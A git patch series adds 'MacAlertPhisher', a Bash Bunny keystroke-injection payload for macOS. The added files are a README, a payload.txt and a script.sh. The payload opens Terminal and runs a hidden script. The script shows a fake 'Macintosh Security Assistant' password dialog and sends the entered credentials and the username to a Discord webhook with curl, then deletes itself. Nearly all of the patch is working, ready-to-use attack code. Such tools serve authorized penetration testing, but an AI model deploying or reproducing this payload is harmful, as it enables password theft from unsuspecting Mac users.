From 133f6d94aa62217d127a9580d750c99062ac9c5a Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Fri, 28 Jul 2023 23:00:19 +0200 Subject: [PATCH 1/3] Add MacAlertPhisher --- .../phishing/MacAlertPhisher/README.md | 20 +++++++++++ .../phishing/MacAlertPhisher/payload.txt | 36 +++++++++++++++++++ .../phishing/MacAlertPhisher/script.sh | 33 +++++++++++++++++ 3 files changed, 89 insertions(+) create mode 100644 payloads/library/phishing/MacAlertPhisher/README.md create mode 100644 payloads/library/phishing/MacAlertPhisher/payload.txt create mode 100644 payloads/library/phishing/MacAlertPhisher/script.sh diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md new file mode 100644 index 000000000..8d165c104 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -0,0 +1,20 @@ +# MacAlertPhisher +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. + +### Setup +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE | +| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | + +*Average runtime: 26 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt new file mode 100644 index 000000000..532527b11 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt @@ -0,0 +1,36 @@ +#!/bin/bash +# +# Title: MacAlertPhisher +# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +# Author: 90N45 +# Version: 1.0 +# Category: Phishing +# Attackmodes: HID, STORAGE + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +LED ATTACK +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 2500 + +QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh" +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING "diskutil eject /Volumes/BashBunny/" +QUACK ENTER +QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" +QUACK ENTER +QUACK GUI SPACE +QUACK DELAY 1500 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "killall Terminal" +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh new file mode 100644 index 000000000..7816c7873 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/script.sh @@ -0,0 +1,33 @@ +#!/bin/bash + +# Discord Webhook Link (NEEDED) +discord="" +# The alert's text +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." +# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +icon="stop" +# A custom application, that should open the alert (for ex. "Finder") +app="" +# Base64 encode the entered string to prevent an injection/syntax error +base64=false + +#### The main script + +if [[ ${app} != "" ]]; then + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +elif [[ ${app} == "" ]]; then + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +fi + + +pwd=${pwd#*"button returned:Continue, text returned:"} + +if [[ ${base64} == true ]]; then + pwd=$(echo $pwd | base64) + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} +else + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} +fi + +# Self destruct +rm /tmp/script.sh \ No newline at end of file From 491e467ca03875467f1f0b8e1656fc199cc82e4e Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:15:28 +0200 Subject: [PATCH 2/3] Add alert title + optional internet check --- .../phishing/MacAlertPhisher/README.md | 4 +- .../phishing/MacAlertPhisher/payload.txt | 5 +- .../phishing/MacAlertPhisher/script.sh | 59 ++++++++++++++++--- 3 files changed, 56 insertions(+), 12 deletions(-) diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index 8d165c104..cf08e0c1e 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -8,7 +8,7 @@ Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. ### Setup -Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. ### Status | LED | State | @@ -17,4 +17,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 26 seconds* \ No newline at end of file +*Average runtime: 27 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt index 532527b11..615bd1204 100644 --- a/payloads/library/phishing/MacAlertPhisher/payload.txt +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt @@ -25,11 +25,12 @@ QUACK STRING "diskutil eject /Volumes/BashBunny/" QUACK ENTER QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" QUACK ENTER +QUACK DELAY 2000 QUACK GUI SPACE -QUACK DELAY 1500 +QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER -QUACK DELAY 500 +QUACK DELAY 1000 QUACK STRING "killall Terminal" QUACK ENTER diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh index 7816c7873..7a3070318 100644 --- a/payloads/library/phishing/MacAlertPhisher/script.sh +++ b/payloads/library/phishing/MacAlertPhisher/script.sh @@ -2,32 +2,75 @@ # Discord Webhook Link (NEEDED) discord="" +# The alert's title +title="Macintosh Security Assistant" # The alert's text -dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." -# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner." +# The alert's icon (for ex. "stop", "caution", "note") icon="stop" # A custom application, that should open the alert (for ex. "Finder") app="" -# Base64 encode the entered string to prevent an injection/syntax error +# Base64 encode the entered string to prevent an injection/error base64=false +# Check if an internet connection is available and wait until it is before trying to send the Discord message +internet_check=false #### The main script +date=$(date) +user=$(whoami) + if [[ ${app} != "" ]]; then - pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') elif [[ ${app} == "" ]]; then - pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') fi - pwd=${pwd#*"button returned:Continue, text returned:"} if [[ ${base64} == true ]]; then pwd=$(echo $pwd | base64) - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} + enc_txt="(Base64)" else - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} + enc_txt="" +fi + +# Discord Embed Message +embed="{ + \"embeds\": [ + { + \"color\": 14427938, + \"footer\": { + \"text\": \"Captured: ${date}\" + }, + \"author\": { + \"name\": \"Bash Bunny • MacAlertPhisher\", + \"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\", + \"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\" + }, + \"fields\": [ + { + \"name\": \"Current User\", + \"value\": \"${user}\", + \"inline\": true + }, + { + \"name\": \"Entered Credentials ${enc_txt}\", + \"value\": \"${pwd}\", + \"inline\": true + } + ] + } + ] +}" + +if [[ ${internet_check} == true ]]; then + while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do + sleep 5 + done fi +curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord} + # Self destruct rm /tmp/script.sh \ No newline at end of file From 0750db3a35ef72b79a29dc1c7a8d4236bbb0d471 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:35:31 +0200 Subject: [PATCH 3/3] Add pictures to README.md --- payloads/library/phishing/MacAlertPhisher/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index cf08e0c1e..3b8c03ebe 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -7,6 +7,10 @@ ### Description Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +MAcAlertPhisher_alert_preview +
+MacAlertPhisher_message_preview + ### Setup Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. @@ -17,4 +21,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 27 seconds* \ No newline at end of file +*Average runtime: 27 seconds*